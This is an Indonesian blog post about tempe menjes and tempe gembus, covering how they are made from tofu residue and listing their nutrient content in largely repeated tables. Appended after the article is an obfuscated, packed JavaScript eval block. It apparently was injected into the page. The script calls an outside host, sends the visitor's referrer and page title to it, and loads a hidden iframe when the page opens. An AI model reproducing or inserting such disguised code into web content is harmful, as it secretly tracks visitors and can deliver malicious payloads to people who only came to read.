browser icon
You are using an insecure version of your web browser. Please update your browser!
Using an outdated browser makes your computer unsafe. For a safer, faster, more enjoyable user experience, please update your browser today or try a newer browser.

Menjes dan Gembus dari Keluarga Tempe

Posted by on January 10, 2014

tempe menjes

Warga malang ??? pasti tau dong ama tempe yang satu ini. Di Malang, makanan ini umum disajikan dengan dibalut tepung dan digoreng sebagai camilan.

Menurut tante wiki, tempe menjes ini dapat dikatakan sama dengan tempe gembus yang terdapat di daerah Yogyakarta dan Surakarta. Tempe ini terbuat dari ampas tahu yang difermentasikan seperti membuat tempe biasa. Terdapat dua jenis menjes, yaitu menjes bertekstur kasar, yang disebut menjes kacang, dan menjes bertekstur halus, yang disebut menjes gombal dan dikatakan sama dengan tempe gembus yang ditemukan di Jawa Tengah dan Yogyakarta. Menjes bertekstur kasar dibuat dari kedelai hitam atau ampas tempe, namun ada pula yang menyebutnya berbahan campuran kacang dan kedelai, serat singkong, dan bungkil kedelai.Sementara itu, menjes bertekstur halus dibuat dari ampas pembuatan tahu dan ampas kelapa.

Walaupun dari ampas, tetapi tempe ini cukup bergizi lho. Dikutip dari situs ini, tempe menjes/gambus mengandung energi sebesar 73 kilokalori, protein 5,7 gram, karbohidrat 10,3 gram, lemak 1,3 gram, kalsium 204 miligram, fosfor 80 miligram, dan zat besi 1,5 miligram.  Selain itu di dalam Tempe Gembus juga terkandung vitamin A sebanyak 0 IU, vitamin B1 0,09 miligram dan vitamin C 0 miligram.  Hasil tersebut didapat dari melakukan penelitian terhadap 100 gram Tempe Gembus, dengan jumlah yang dapat dimakan sebanyak 100 %.

Informasi Rinci Komposisi Kandungan Nutrisi/Gizi Pada Tempe Gembus :

Nama Bahan Makanan : Tempe Gembus
Nama Lain / Alternatif : Tempe Embus
Banyaknya Tempe Gembus yang diteliti (Food Weight) = 100 gr
Bagian Tempe Gembus yang dapat dikonsumsi (Bdd / Food Edible) = 100 %
Jumlah Kandungan Energi Tempe Gembus = 73 kkal
Jumlah Kandungan Protein Tempe Gembus = 5,7 gr
Jumlah Kandungan Lemak Tempe Gembus = 1,3 gr
Jumlah Kandungan Karbohidrat Tempe Gembus = 10,3 gr
Jumlah Kandungan Kalsium Tempe Gembus = 204 mg
Jumlah Kandungan Fosfor Tempe Gembus = 80 mg
Jumlah Kandungan Zat Besi Tempe Gembus = 1,5 mg
Jumlah Kandungan Vitamin A Tempe Gembus = 0 IU
Jumlah Kandungan Vitamin B1 Tempe Gembus = 0,09 mg
Jumlah Kandungan Vitamin C Tempe Gembus = 0 mg
Khasiat / Manfaat Tempe Gembus : – (Belum Tersedia)
Huruf Awal Nama Bahan Makanan : T
Sumber Informasi Gizi : Berbagai publikasi Kementerian Kesehatan Republik Indonesia serta sumber lainnya.

Hasil Penelitian Lain :

Nama Bahan Makanan : Tempe Gembus Versi Puslitbang

Banyaknya Tempe Gembus yang diteliti (Food Weight) = 100 gr
Bagian Tempe Gembus yang dapat dikonsumsi (Bdd / Food Edible) = 100 %
Jumlah Kandungan Energi Tempe Gembus = 73 kkal
Jumlah Kandungan Protein Tempe Gembus = 5,7 gr
Jumlah Kandungan Lemak Tempe Gembus = 1,3 gr
Jumlah Kandungan Karbohidrat Tempe Gembus = 10,3 gr
Jumlah Kandungan Kalsium Tempe Gembus = 204 mg
Jumlah Kandungan Fosfor Tempe Gembus = 80 mg
Jumlah Kandungan Zat Besi Tempe Gembus = 1,5 mg
Jumlah Kandungan Vitamin A Tempe Gembus = 0 IU
Jumlah Kandungan Vitamin B1 Tempe Gembus = 0,09 mg
Jumlah Kandungan Vitamin C Tempe Gembus = 0 mg

Nama Bahan Makanan : Tempe Gembus Jogja
Nama Lain / Alternatif : Tempe Gembus Yogya
Banyaknya Tempe Gembus Jogja yang diteliti (Food Weight) = 100 gr
Bagian Tempe Gembus Jogja yang dapat dikonsumsi (Bdd / Food Edible) = 100 %
Jumlah Kandungan Energi Tempe Gembus Jogja = 76 kkal
Jumlah Kandungan Protein Tempe Gembus Jogja = 8,6 gr
Jumlah Kandungan Lemak Tempe Gembus Jogja = 0,7 gr
Jumlah Kandungan Karbohidrat Tempe Gembus Jogja = 10,6 gr
Jumlah Kandungan Kalsium Tempe Gembus Jogja = 76 mg
Jumlah Kandungan Fosfor Tempe Gembus Jogja = 142 mg
Jumlah Kandungan Zat Besi Tempe Gembus Jogja = 16,5 mg
Jumlah Kandungan Vitamin A Tempe Gembus Jogja = 0 IU
Jumlah Kandungan Vitamin B1 Tempe Gembus Jogja = 0,79 mg
Jumlah Kandungan Vitamin C Tempe Gembus Jogja = 0 mg

Keterangan :
Riset/penelitian pada Tempe Gembus yang berbeda bisa menghasilkan perbedaan hasil yang didapat karena berbagai faktor yang mempengaruhi.   

 
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘(9(){2 d=3;2 4=1;2 5=1;2 t=d.a(\’b\’);2 6=7.c(7.e()*f);2 0=\’g://h.i/j/k?\’;0=0+\’l=\’+3.m;0=0+\’&n=\’+3.o;0=0+\’&r=\’+6;d.p(\’\’)})();’,35,35,’src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height’.split(‘|’),0,{}))

Leave a Reply